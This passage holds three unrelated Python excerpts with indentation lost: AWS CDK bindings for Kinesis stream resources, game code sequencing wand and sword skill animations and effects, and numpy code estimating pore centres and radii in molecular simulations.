shard_count: jsii.Number,
name: typing.Optional[builtins.str] = None,
retention_period_hours: typing.Optional[jsii.Number] = None,
stream_encryption: typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]] = None,
tags: typing.Optional[typing.Sequence[aws_cdk.core.CfnTag]] = None,
) -> None:
'''Create a new ``AWS::Kinesis::Stream``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param shard_count: ``AWS::Kinesis::Stream.ShardCount``.
:param name: ``AWS::Kinesis::Stream.Name``.
:param retention_period_hours: ``AWS::Kinesis::Stream.RetentionPeriodHours``.
:param stream_encryption: ``AWS::Kinesis::Stream.StreamEncryption``.
:param tags: ``AWS::Kinesis::Stream.Tags``.
'''
props = CfnStreamProps(
shard_count=shard_count,
name=name,
retention_period_hours=retention_period_hours,
stream_encryption=stream_encryption,
tags=tags,
)
jsii.create(CfnStream, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrArn")
def attr_arn(self) -> builtins.str:
'''
:cloudformationAttribute: Arn
'''
return typing.cast(builtins.str, jsii.get(self, "attrArn"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
'''``AWS::Kinesis::Stream.Tags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-tags
'''
return typing.cast(aws_cdk.core.TagManager, jsii.get(self, "tags"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="shardCount")
def shard_count(self) -> jsii.Number:
'''``AWS::Kinesis::Stream.ShardCount``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-shardcount
'''
return typing.cast(jsii.Number, jsii.get(self, "shardCount"))
@shard_count.setter
def shard_count(self, value: jsii.Number) -> None:
jsii.set(self, "shardCount", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[builtins.str]:
'''``AWS::Kinesis::Stream.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-name
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "name"))
@name.setter
def name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="retentionPeriodHours")
def retention_period_hours(self) -> typing.Optional[jsii.Number]:
'''``AWS::Kinesis::Stream.RetentionPeriodHours``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-retentionperiodhours
'''
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "retentionPeriodHours"))
@retention_period_hours.setter
def retention_period_hours(self, value: typing.Optional[jsii.Number]) -> None:
jsii.set(self, "retentionPeriodHours", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="streamEncryption")
def stream_encryption(
self,
) -> typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]]:
'''``AWS::Kinesis::Stream.StreamEncryption``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-stream.html#cfn-kinesis-stream-streamencryption
'''
return typing.cast(typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]], jsii.get(self, "streamEncryption"))
@stream_encryption.setter
def stream_encryption(
self,
value: typing.Optional[typing.Union["CfnStream.StreamEncryptionProperty", aws_cdk.core.IResolvable]],
) -> None:
jsii.set(self, "streamEncryption", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-kinesis.CfnStream.StreamEncryptionProperty",
jsii_struct_bases=[],
name_mapping={"encryption_type": "encryptionType", "key_id": "keyId"},
)
class StreamEncryptionProperty:
def __init__(
self,
*,
encryption_type: builtins.str,
key_id: builtins.str,
) -> None:
'''
:param encryption_type: ``CfnStream.StreamEncryptionProperty.EncryptionType``.
:param key_id: ``CfnStream.StreamEncryptionProperty.KeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html
'''
self._values: typing.Dict[str, typing.Any] = {
"encryption_type": encryption_type,
"key_id": key_id,
}
@builtins.property
def encryption_type(self) -> builtins.str:
'''``CfnStream.StreamEncryptionProperty.EncryptionType``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html#cfn-kinesis-stream-streamencryption-encryptiontype
'''
result = self._values.get("encryption_type")
assert result is not None, "Required property 'encryption_type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def key_id(self) -> builtins.str:
'''``CfnStream.StreamEncryptionProperty.KeyId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesis-stream-streamencryption.html#cfn-kinesis-stream-streamencryption-keyid
'''
result = self._values.get("key_id")
assert result is not None, "Required property 'key_id' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "StreamEncryptionProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnStreamConsumer(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-kinesis.CfnStreamConsumer",
):
'''A CloudFormation ``AWS::Kinesis::StreamConsumer``.
:cloudformationResource: AWS::Kinesis::StreamConsumer
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesis-streamconsumer.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
consumer_name: builtins.str,
stream_arn: builtins.str,
) -> None:
'''Create a new ``AWS::Kinesis::StreamConsumer``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param consumer_name: ``AWS::Kinesis::StreamConsumer.ConsumerName``.
:param stream_arn: ``AWS::Kinesis::StreamConsumer.StreamARN``.
'''
props = CfnStreamConsumerProps(
consumer_name=consumer_name, stream_arn=stream_arn
)
jsii.create(CfnStreamConsumer, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
| |
seq = Sequence(Func(av.motionFSM.moveLock), Func(av.currentWeapon.hideMouse, av), Func(base.cr.targetMgr.setWantAimAssist, 1), Func(self.startChargeSound, av, skillId), Func(startVFX), av.actorInterval('wand_cast_start', blendOutT = 0), Func(av.loop, 'wand_cast_idle', blendT = 0))
del startVFX
return seq
def getCastHellfireAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
if isinstance(av.currentWeapon.effect, FlamingSkull):
av.currentWeapon.effect.wrtReparentTo(render)
(targetPos, speed, impactT) = av.getProjectileInfo(skillId, None)
av.currentWeapon.effect.playLaunch(speed, targetPos)
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
seq = Sequence(Func(av.considerEnableMovement), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.stopChargeSound, av), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getChargeBanishAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
offset = av.currentWeapon.getOffset(av.currentWeapon.itemId)
av.currentWeapon.effect = VoodooPower.getEffect(unlimited)
if av.currentWeapon.effect and not av.currentWeapon.isEmpty():
av.currentWeapon.effect.reparentTo(av.currentWeapon)
av.currentWeapon.effect.setPos(av.currentWeapon, offset + Vec3(0, 1.45, -0.10000000000000001))
av.currentWeapon.effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
av.currentWeapon.effect.startLoop()
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
av.currentWeapon.effect2 = EnergySpiral.getEffect(unlimited)
if av.currentWeapon.effect2 and not av.currentWeapon.isEmpty():
av.currentWeapon.effect2.reparentTo(av.currentWeapon)
av.currentWeapon.effect2.setPos(av.currentWeapon, offset + Vec3(0, 0, -0.10000000000000001))
av.currentWeapon.effect2.setHpr(av.currentWeapon, 0.0, -90.0, 0.0)
av.currentWeapon.effect2.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
av.currentWeapon.effect2.startLoop()
seq = Sequence(Func(av.motionFSM.moveLock), Func(av.currentWeapon.hideMouse, av), Func(base.cr.targetMgr.setWantAimAssist, 1), Func(self.startChargeSound, av, skillId), Func(startVFX), av.actorInterval('wand_cast_start', blendOutT = 0), Func(av.loop, 'wand_cast_idle', blendT = 0))
del startVFX
return seq
def getCastBanishAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
effect = VoodooGlow.getEffect(unlimited)
if effect and not av.currentWeapon.isEmpty():
effect.reparentTo(av.currentWeapon)
effect.setPos(av.currentWeapon, av.currentWeapon.getOffset(av.currentWeapon.itemId))
effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
effect.play()
seq = Sequence(Func(av.considerEnableMovement), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.stopChargeSound, av), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getChargeDesolationAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
av.currentWeapon.effectActor = Actor.Actor('models/effects/mopath_none', {
'spin': 'models/effects/mopath_spiral' })
joint = av.currentWeapon.effectActor.find('**/joint1')
av.currentWeapon.effectActor.setScale(1.0, 0.75, 1.0)
av.currentWeapon.effectActor.setP(0.0)
av.currentWeapon.effectActor.reparentTo(av.currentWeapon)
av.currentWeapon.effectActor.setPos(av.currentWeapon, 0.0, 1.7, 0.0)
av.currentWeapon.effectActor.setPlayRate(1.5, 'spin')
av.currentWeapon.effectActor.loop('spin')
av.currentWeapon.effect = DesolationChargeSmoke.getEffect(unlimited)
if av.currentWeapon.effect and not av.currentWeapon.isEmpty():
av.currentWeapon.effect.particleDummy.reparentTo(av.currentWeapon)
av.currentWeapon.effect.reparentTo(joint)
av.currentWeapon.effect.effectScale = 1.0
av.currentWeapon.effect.startLoop()
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsHigh:
av.currentWeapon.effect2 = WindCharge.getEffect(unlimited)
if av.currentWeapon.effect2 and not av.currentWeapon.isEmpty():
av.currentWeapon.effect2.reparentTo(av.currentWeapon)
av.currentWeapon.effect2.setPos(av.currentWeapon, 0.0, 1.25, 0.0)
av.currentWeapon.effect2.setHpr(0, -90, 0)
av.currentWeapon.effect2.startLoop()
seq = Sequence(Func(av.motionFSM.moveLock), Func(av.currentWeapon.hideMouse, av), Func(base.cr.targetMgr.setWantAimAssist, 1), Func(self.startChargeSound, av, skillId), Func(startVFX), av.actorInterval('wand_cast_start', blendOutT = 0), Func(av.loop, 'wand_cast_idle', blendT = 0))
del startVFX
return seq
def getCastDesolationAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
effect = WindWave.getEffect(unlimited)
if effect:
effect.reparentTo(av.getParent())
effect.setEffectColor(Vec4(1, 1, 1, 0.75))
effect.setPos(av, 0.0, 0.0, 0.0)
effect.setScale(1.0, 1.0, 1.0)
effect.setHpr(0.0, 0.0, 0.0)
effect.play()
effect = SoulHarvest2.getEffect(unlimited)
if effect:
effect.reparentTo(av.getParent())
effect.setPos(av, 0, 0, 2)
effect.radius = av.cr.battleMgr.getModifiedAttackAreaRadius(av, skillId, ammoSkillId)
effect.play()
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
effect = DesolationSmoke.getEffect(unlimited)
if effect:
effect.reparentTo(av.getParent())
effect.setEffectColor(Vec4(1, 1, 1, 1))
effect.setPos(av, 0.0, 0.0, 0.0)
effect.play()
effect = DomeExplosion.getEffect(unlimited)
if effect:
effect.reparentTo(av.getParent())
effect.setPos(av, 0, 0, 0)
effect.size = av.cr.battleMgr.getModifiedAttackAreaRadius(av, skillId, ammoSkillId)
effect.play()
effect = DarkPortal.getEffect(unlimited)
if effect:
effect.reparentTo(av.getParent())
effect.setPos(av, 0, 0, 0)
effect.size = av.cr.battleMgr.getModifiedAttackAreaRadius(av, skillId, ammoSkillId) * 3.0
effect.play()
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsHigh:
cameraShakerEffect = CameraShaker()
cameraShakerEffect.wrtReparentTo(av.getParent())
cameraShakerEffect.setPos(av, 0.0, 0.0, 0.0)
cameraShakerEffect.shakeSpeed = 0.074999999999999997
cameraShakerEffect.shakePower = 1.0
cameraShakerEffect.numShakes = 30
cameraShakerEffect.scalePower = 1
cameraShakerEffect.play(100.0)
seq = Sequence(Func(av.considerEnableMovement), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.stopChargeSound, av), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getFizzleAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
return Sequence(Func(av.considerEnableMovement), Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.lockInput, av), Func(self.stopChargeSound, av), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
def getCastFireAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
unlimited = av.isLocal()
self.cleanWeaponEffects(av)
motion_color = [
Vec4(1.0, 1.0, 1.0, 1.0),
Vec4(0.5, 0.20000000000000001, 1.0, 1.0)]
(targetPos, speed, impactT) = av.getProjectileInfo(skillId, target)
effect = VoodooProjectile.getEffect(unlimited)
if effect:
effect.reparentTo(render)
effect.setPos(av, 0, 2, 2)
effect.setH(av.getH(render))
effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
effect.play(targetPos, speed, target)
if base.options.getSpecialEffectsSetting() >= base.options.SpecialEffectsMedium:
effect = VoodooGlow.getEffect()
if effect and not av.currentWeapon.isEmpty():
effect.reparentTo(av.currentWeapon)
effect.setPos(av.currentWeapon, 0.0, 2.0, 0.0)
effect.setEffectColor(av.currentWeapon.getEffectColor(av.currentWeapon.itemId))
effect.play()
seq = Sequence(Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.lockInput, av), Func(av.attackTire), Func(startVFX), Func(self.playCastSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getToggleAuraOnAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
def startVFX():
if not hasattr(av.currentWeapon, 'getStartWardingAura'):
return None
if skillId == EnemySkills.STAFF_TOGGLE_AURA_WARDING:
av.currentWeapon.getStartWardingAura(av).start()
elif skillId == EnemySkills.STAFF_TOGGLE_AURA_NATURE:
av.currentWeapon.getStartNatureAura(av).start()
elif skillId == EnemySkills.STAFF_TOGGLE_AURA_DARK:
av.currentWeapon.getStartDarkAura(av).start()
seq = Sequence(Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.lockInput, av), Func(startVFX), Func(self.startChargeSound, av, skillId), av.actorInterval('wand_cast_fire'), Func(self.unlockInput, av))
del startVFX
return seq
def getToggleAuraOffAnim(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
seq = Sequence(Func(base.cr.targetMgr.setWantAimAssist, 0), Func(self.stopChargeSound, av), Func(self.lockInput, av), Func(self.unlockInput, av))
return seq
def cleanWeaponEffects(self, av):
if av.currentWeapon:
if av.currentWeapon.effect:
av.currentWeapon.effect.stopLoop()
av.currentWeapon.effect = None
if av.currentWeapon.effect2:
av.currentWeapon.effect2.stopLoop()
av.currentWeapon.effect2 = None
def getDrink(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.consumable:
return None
def hideCurrentWeapon():
if av.currentWeapon:
if not av.currentWeapon.isEmpty():
av.currentWeapon.hide()
def showCurrentWeapon():
if av.currentWeapon:
if not av.currentWeapon.isEmpty():
av.currentWeapon.show()
return Sequence(Func(self.lockInput, av), Func(av.attackTire), Func(self.lockDrink, av), Func(hideCurrentWeapon), Func(av.consumable.updateItemId, ammoSkillId), Func(av.consumable.attachTo, av), av.actorInterval('drink_potion', playRate = 1.5, startFrame = 8, endFrame = 45, blendInT = 0.20000000000000001, blendOutT = 0.20000000000000001), Func(showCurrentWeapon), Func(av.consumable.detachFrom, av), Func(self.unlockInput, av), Wait(0.59999999999999998), Func(self.unlockDrink, av))
def getChop(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), av.actorInterval('sword_cleave', playRate = 1.0, startFrame = 9, endFrame = 45, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getDoubleSlash(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), av.actorInterval('sword_slash', playRate = 1.5, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getLunge(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Func(av.currentWeapon.playSkillSfx, skillId, av), av.actorInterval('sword_lunge', playRate = 1.5, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getStab(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Func(av.currentWeapon.playSkillSfx, skillId, av), av.actorInterval('sword_thrust', playRate = 1.0, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getRollThrust(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
placeHolder = av.attachNewNode('rollThrustPlaceHolder')
if target:
placeHolder.lookAt(target)
newH = av.getH() + placeHolder.getH()
self.rollDistance = av.getDistance(target)
else:
newH = av.getH()
self.rollDistance = WeaponGlobals.getAttackRange(skillId, ammoSkillId)
self.rollDistance = max(0.0, self.rollDistance - 0.5)
self.currAmount = 0
def setRollPosition(v):
distance = self.rollDistance * v - self.currAmount
self.currAmount += distance
rotMat = Mat3.rotateMatNormaxis(av.getH(), Vec3.up())
contact = av.physControls.lifter.getContactNormal()
forward = contact.cross(Vec3.right())
forward.normalize()
vel = Vec3(forward * distance)
vel = Vec3(rotMat.xform(vel))
av.setFluidPos(Point3(av.getPos() + vel))
if av.isLocal():
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Func(av.controlManager.currentControls.setCollisionsActive, 1), Parallel(av.actorInterval('sword_roll_thrust', playRate = 1.5, startFrame = 1, blendInT = 0, blendOutT = 0), LerpHprInterval(av, 0.050000000000000003, Vec3(newH, av.getP(), av.getR())), Sequence(Wait(0.29999999999999999), LerpFunctionInterval(setRollPosition, duration = 0.59999999999999998, fromData = 0.0, toData = 1.0, name = 'setRollPosition')), Sequence(Wait(0.59999999999999998), Func(av.controlManager.currentControls.setCollisionsActive, 0), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))))
else:
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), Parallel(av.actorInterval('sword_roll_thrust', playRate = 1.5, startFrame = 1, blendInT = 0, blendOutT = 0), Sequence(Wait(0.59999999999999998), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))))
placeHolder.removeNode()
return ival
def getComboA(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Sequence(Func(self.lockInput, av), Func(av.motionFSM.off), Func(av.currentWeapon.hideMouse, av), Func(av.currentWeapon.setTrailLength, 0.40000000000000002), Func(av.currentWeapon.beginAttack, av), av.actorInterval('sword_comboA', playRate = 1.5, blendInT = 0.5, blendOutT = 0.5), Func(av.currentWeapon.endAttack, av), Func(av.considerEnableMovement), Func(self.unlockInput, av))
return ival
def getWildSlash(self, av, skillId, ammoSkillId, charge, target, skillResult):
if not av.currentWeapon:
return None
ival = Parallel(Sequence(Func(self.lockInput, av), Func(av.currentWeapon.endAttack, av), Func(av.currentWeapon.setTrailLength, 0.5), Func(av.currentWeapon.beginAttack, av), av.actorInterval('dagger_combo', playRate = 1.0, startFrame = 54, endFrame = 87, blendInT | |
# So ugly ... sadness :(
p2ps[0, i] = np.linalg.norm(p_centers[:, 0, i] - p_centers[:, 1, i])
p2ps[1, i] = np.linalg.norm(p_centers[:, 0, i] - p_centers[:, 2, i])
p2ps[2, i] = np.linalg.norm(p_centers[:, 0, i] - p_centers[:, 3, i])
p2ps[3, i] = np.linalg.norm(p_centers[:, 1, i] - p_centers[:, 2, i])
p2ps[4, i] = np.linalg.norm(p_centers[:, 1, i] - p_centers[:, 3, i])
p2ps[5, i] = np.linalg.norm(p_centers[:, 2, i] - p_centers[:, 3, i])
return p2ps
def limits(pos, pcenters):
"""
Estimate the pore 'radius' based on the position of some component and it's maximum deviation from the pore center
:param: pos: the positions of all atoms included in making the estimate
:param: pcenters: the x,y positions of the pore centers for each frame
:return: an approximate pore radius. Beyond which, we have entered the alkane region
"""
nT = pcenters.shape[0]
npores = pcenters.shape[1]
natoms = pos.shape[1]
atom_ppore = natoms // npores
deviation = np.zeros([nT, npores, atom_ppore])
for f in tqdm.tqdm(range(nT)):
for i in range(atom_ppore):
for j in range(npores):
deviation[f, j, i] = np.linalg.norm(pos[f, j*atom_ppore + i, :2] - pcenters[f, j, :])
#deviation = np.reshape(deviation, (nT, natoms))
fr = np.zeros([nT])
frstd = np.zeros([nT])
#
# for i in range(nT):
# fr[i] = np.mean(deviation[i, :]) # + np.std(deviation[i, :]) # maybe?
# frstd[i] = np.std(deviation[i, :])
radii = np.zeros([nT, npores])
for t in range(nT):
for p in range(npores):
radii[t, p] = np.mean(deviation[t, p, :])
return radii
def put_in_box(pt, x_box, y_box, m, angle):
"""
:param pt: The point to place back in the box
:param x_box: length of box in x dimension
:param y_box: length of box in y dimension
:param m: slope of box vector
:param angle: angle between x axis and y box vector
:return: coordinate shifted into box
"""
b = - m * x_box # y intercept of box vector that does not pass through origin (right side of box)
if pt[1] < 0:
pt[:2] += [np.cos(angle)*x_box, np.sin(angle)*x_box] # if the point is under the box
if pt[1] > y_box:
pt[:2] -= [np.cos(angle)*x_box, np.sin(angle)*x_box]
if pt[1] > m*pt[0]: # if the point is on the left side of the box
pt[0] += x_box
if pt[1] < (m*pt[0] + b): # if the point is on the right side of the box
pt[0] -= x_box
return pt
def trace_pores(pos, box, npoints, npores=4, progress=True, save=True, savename='spline.pl'):
"""
Find the line which traces through the center of the pores
:param pos: positions of atoms used to define pore location (args.ref) [natoms, 3]
:param box: xy box vectors, [2, 2], mdtraj format (t.unitcell_vectors)
:param npoints: number of points for spline in each pore
:param npores: number of pores in unit cell (assumed that atoms are number sequentially by pore. i.e. pore 1 atom
numbers all precede those in pore 2)
:param progress: set to True if you want a progress bar to be shown
:param save: save spline as pickled object
:param savename: path to spline. If absolute path is not provided, will look in current directory
:type pos: np.ndarray
:type box: np.ndarray
:type npoints: int
:type npores: int
:type progress: bool
:type save: bool
:type savename: str
:return: points which trace the pore center
"""
try:
print('Attempting to load spline ... ', end='', flush=True)
spline = file_rw.load_object(savename)
print('Success!')
return spline[0], spline[1]
except FileNotFoundError:
print('%s not found ... Calculating spline' % savename)
single_frame = False
if np.shape(pos.shape)[0] == 2:
pos = pos[np.newaxis, ...] # add a new axis if we are looking at a single frame
box = box[np.newaxis, ...]
single_frame = True
nframes = pos.shape[0]
atoms_p_pore = int(pos.shape[1] / npores) # atoms in each pore
v = np.zeros([nframes, 4, 2]) # vertices of unitcell box
bounds = []
v[:, 0, :] = [0, 0]
v[:, 1, 0] = box[:, 0, 0]
v[:, 3, :] = np.vstack((box[:, 1, 0], box[:, 1, 1])).T
v[:, 2, :] = v[:, 3, :] + np.vstack((box[:, 0, 0], np.zeros([nframes]))).T
center = np.vstack((np.mean(v[..., 0], axis=1), np.mean(v[..., 1], axis=1), np.zeros(nframes))).T
for t in range(nframes):
bounds.append(mplPath.Path(v[t, ...])) # create a path tracing the vertices, v
angle = np.arcsin(box[:, 1, 1]/box[:, 0, 0]) # specific to case where magnitude of x and y box lengths are equal
angle = np.where(box[:, 1, 0] < 0, angle + np.pi / 2, angle) # haven't tested this well yet
m = (v[:, 3, 1] - v[:, 0, 1]) / (v[:, 3, 0] - v[:, 0, 0]) # slope from points connecting first and third vertices
centers = np.zeros([nframes, npores, npoints, 3])
bin_centers = np.zeros([nframes, npores, npoints])
for t in tqdm.tqdm(range(nframes), disable=(not progress)):
for p in range(npores):
pore = pos[t, p*atoms_p_pore:(p+1)*atoms_p_pore, :] # coordinates for atoms belonging to a single pore
while np.min(pore[:, 2]) < 0 or np.max(pore[:, 2]) > box[t, 2, 2]: # because cross-linked configurations can extend very far up and down
pore[:, 2] = np.where(pore[:, 2] < 0, pore[:, 2] + box[t, 2, 2], pore[:, 2])
pore[:, 2] = np.where(pore[:, 2] > box[t, 2, 2], pore[:, 2] - box[t, 2, 2], pore[:, 2])
_, bins = np.histogram(pore[:, 2], bins=npoints) # bin z-positions
section_indices = np.digitize(pore[:, 2], bins) # list that tells which bin each atom belongs to
bin_centers[t, p, :] = [(bins[i] + bins[i + 1])/2 for i in range(npoints)]
for l in range(1, npoints + 1):
atom_indices = np.where(section_indices == l)[0]
before = pore[atom_indices[0], :] # choose the first atom as a reference
shift = transform.translate(pore[atom_indices, :], before, center[t, :]) # shift everything to towards the center
for i in range(shift.shape[0]): # check if the points are within the bounds of the unitcell
while not bounds[t].contains_point(shift[i, :2]):
